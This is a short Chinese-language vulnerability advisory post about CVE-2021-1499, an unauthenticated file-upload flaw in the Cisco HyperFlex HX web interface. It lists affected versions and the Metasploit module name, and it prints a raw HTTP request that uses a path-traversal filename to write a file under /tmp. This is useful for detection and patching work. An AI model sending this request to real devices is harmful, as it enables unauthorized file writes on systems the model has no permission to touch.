CVE-2021-1499 Cisco HyperFlex HX 数据平台 - 文件上传漏洞

原创

Khan安全团队

修改于 2021-10-18 16:03:46

1.1K0

Cisco HyperFlex HX 数据平台基于 Web 的管理界面中存在一个漏洞，该漏洞可能允许未经身份验证的远程攻击者将文件上传到受影响的设备。此漏洞是由于缺少上传功能的身份验证。攻击者可以通过向受影响的设备发送特定的 HTTP 请求来利用此漏洞。成功的利用可能允许攻击者使用 tomcat8 用户的权限将文件上传到受影响的设备。

Metasploit Module

exploit/linux/http/cisco_hyperflex_file_upload_rce

影响范围 :

HyperFlex HX <= 4.0

HyperFlex HX = 4.5

漏洞类型 :

文件上传

利用条件 :

1、用户认证：不需要用户认证

2、触发方式：远程

        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
        Origin: {{RootURL}}
        Referer: {{RootURL}}
        -----------------------------253855577425106594691130420583
        Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
        Content-Type: application/json
        MyPasswdNewData->/api/tomcat
        -----------------------------253855577425106594691130420583--

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

网络安全